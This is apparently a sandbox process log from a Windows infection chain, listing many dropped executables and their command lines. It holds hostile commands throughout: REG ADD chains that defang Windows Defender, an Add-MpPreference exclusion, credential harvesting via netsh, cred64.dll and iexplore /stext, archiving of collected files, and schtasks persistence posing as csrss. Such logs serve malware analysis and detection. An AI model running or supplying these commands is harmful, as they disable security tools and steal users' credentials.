"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
C:\Users\Admin\AppData\Local\Temp\2E6A.exe
C:\Users\Admin\AppData\Local\Temp\2E6A.exe
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.0.816648984\1229329128" -parentBuildID 20221007134813 -prefsHandle 1776 -prefMapHandle 1768 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de6af4b3-0f30-4d05-a8a6-398ba077481d} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 1872 1eccdad9858 gpu
C:\Users\Admin\AppData\Local\Temp\2E6A.exe
C:\Users\Admin\AppData\Local\Temp\2E6A.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1980,i,5393602021566285528,674770183575587431,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=1980,i,5393602021566285528,674770183575587431,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1972,i,14837426883159466390,2584554103553490410,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1584 --field-trial-handle=1972,i,14837426883159466390,2584554103553490410,131072 /prefetch:2
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.1.100499619\1512152703" -parentBuildID 20221007134813 -prefsHandle 2316 -prefMapHandle 2312 -prefsLen 21563 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {791be4ad-8b5f-4c44-875e-30be8b4efcdc} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 2344 1ecba96ec58 socket
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=1988,i,7628991552639747461,11736674585833950061,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1700 --field-trial-handle=1988,i,7628991552639747461,11736674585833950061,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1988,i,12937134176447365376,10907551089122924849,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\1000486001\new.exe
"C:\Users\Admin\AppData\Local\Temp\1000486001\new.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.2.1547528953\636298821" -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3216 -prefsLen 21666 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9ba1fe5-1dd2-4672-b9a9-20478fe1c3e4} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 3232 1ecd10fa258 tab
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=1988,i,12937134176447365376,10907551089122924849,131072 /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.3.1969698435\1018718059" -childID 2 -isForBrowser -prefsHandle 3732 -prefMapHandle 3728 -prefsLen 26064 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79e79581-9b55-4773-b976-6d64c5b3527f} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 3744 1ecba965758 tab
C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe
"C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5560 -ip 5560
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.4.933373074\1363617100" -childID 3 -isForBrowser -prefsHandle 4724 -prefMapHandle 4740 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a832ce82-7b88-45e7-995d-569537c986fb} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 4748 1ecd4d03b58 tab
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 2552
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.5.1276821792\559998068" -childID 4 -isForBrowser -prefsHandle 4988 -prefMapHandle 4984 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ecd6b64-6529-4469-94bb-5bbbd29c3ff6} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 5000 1ecd57e1858 tab
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Users\Admin\AppData\Local\Temp\1000538001\1800.exe
"C:\Users\Admin\AppData\Local\Temp\1000538001\1800.exe"
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\8SH5s1nDkPaUw3uGkt19.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\8SH5s1nDkPaUw3uGkt19.exe"
C:\ProgramData\viewer\viewer.exe
"C:\ProgramData\viewer\viewer.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
C:\Users\Admin\AppData\Local\Temp\578E.exe
C:\Users\Admin\AppData\Local\Temp\578E.exe
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3868 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\1000548001\ladas.exe
"C:\Users\Admin\AppData\Local\Temp\1000548001\ladas.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\o9v3GsJlKEHk0oMJOOrA.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\o9v3GsJlKEHk0oMJOOrA.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1880 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1848 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\6933.exe
C:\Users\Admin\AppData\Local\Temp\6933.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\002246581151_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\1000549001\dota.exe
"C:\Users\Admin\AppData\Local\Temp\1000549001\dota.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\1000552001\lolololoMRK123.exe
"C:\Users\Admin\AppData\Local\Temp\1000552001\lolololoMRK123.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mbegagybvjv"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wwjqtyjvqrnspz"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zywjtjtwezfxafkvtp"
C:\Users\Admin\AppData\Local\Temp\1000553001\987123.exe
"C:\Users\Admin\AppData\Local\Temp\1000553001\987123.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mbegagybvjv"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5520 -ip 5520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 380
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004E8
C:\Users\Admin\AppData\Local\Temp\A766.exe
C:\Users\Admin\AppData\Local\Temp\A766.exe
C:\Users\Admin\AppData\Local\Temp\1000554001\lumma123142124.exe
"C:\Users\Admin\AppData\Local\Temp\1000554001\lumma123142124.exe"
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Users\Admin\AppData\Local\Temp\1000557001\daisy123.exe
"C:\Users\Admin\AppData\Local\Temp\1000557001\daisy123.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8792 -s 1108
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 8792 -ip 8792
C:\Users\Admin\AppData\Local\Temp\FourthX.exe
"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\nsyC944.tmp
C:\Users\Admin\AppData\Local\Temp\nsyC944.tmp
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4532 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\D8F6.exe
C:\Users\Admin\AppData\Local\Temp\D8F6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 7376 -ip 7376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 380
C:\Users\Admin\AppData\Local\Temp\E2BB.exe
C:\Users\Admin\AppData\Local\Temp\E2BB.exe
C:\Users\Admin\AppData\Local\Temp\is-VGI97.tmp\E2BB.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VGI97.tmp\E2BB.tmp" /SL5="$303F4,4074059,54272,C:\Users\Admin\AppData\Local\Temp\E2BB.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7372 -ip 7372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7372 -ip 7372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 1176
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 1140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 7372 -ip 7372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 1196
C:\Users\Admin\AppData\Local\Temp\48C.exe
C:\Users\Admin\AppData\Local\Temp\48C.exe
C:\Users\Admin\AppData\Local\Temp\is-THKQ9.tmp\48C.tmp
"C:\Users\Admin\AppData\Local\Temp\is-THKQ9.tmp\48C.tmp" /SL5="$20460,4502673,54272,C:\Users\Admin\AppData\Local\Temp\48C.exe"
C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\AMOCiTieYDbkqZL\qGOewyT.exe
C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\AMOCiTieYDbkqZL\qGOewyT.exe Lw /yBsite_idjQg 525403 /S
C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe
"C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe" -i
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe
"C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe" -s
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5392 -ip 5392
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 848
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\AppData\Local\Temp\1000559001\alexlll.exe
"C:\Users\Admin\AppData\Local\Temp\1000559001\alexlll.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000560001\father1.exe
"C:\Users\Admin\AppData\Local\Temp\1000560001\father1.exe"
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SYSTEM32\schtasks.exe
